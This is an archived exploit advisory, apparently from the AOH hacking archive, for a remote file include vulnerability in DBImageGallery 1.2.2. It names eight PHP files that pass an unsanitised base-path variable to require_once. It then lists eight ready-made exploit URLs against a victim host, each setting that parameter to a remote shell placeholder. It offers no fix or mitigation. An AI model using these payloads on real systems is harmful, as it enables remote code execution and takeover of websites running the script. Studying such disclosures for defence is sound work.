AOH :: HP Unsorted D :: C07-2516.HTM

DBImageGallery Remote File Include



Remote File Include In DBImageGallery
Remote File Include In DBImageGallery



Remote File Include In DBImageGallery 1.2.2
Discovered By : Hasadya Raed
Contact Me : RaeD@BsdMail.Com 
Download Script : 
http://www.dbscripts.net/download/?file=1 

B.Files:

admin/attributes.php     -> require_once $donsimg_base_path
admin/images.php          -> require_once $donsimg_base_path
admin/scan.php             -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php    -> require_once $donsimg_base_path
includes/images.php     -> require_once $donsimg_base_path
includes/utils.php          -> require_once $donsimg_base_path
includes/values.php      -> require_once $donsimg_base_path
 
Exploits : 

http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack] 


-- 
_______________________________________________
Get your free email from http://bsdmail.com 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.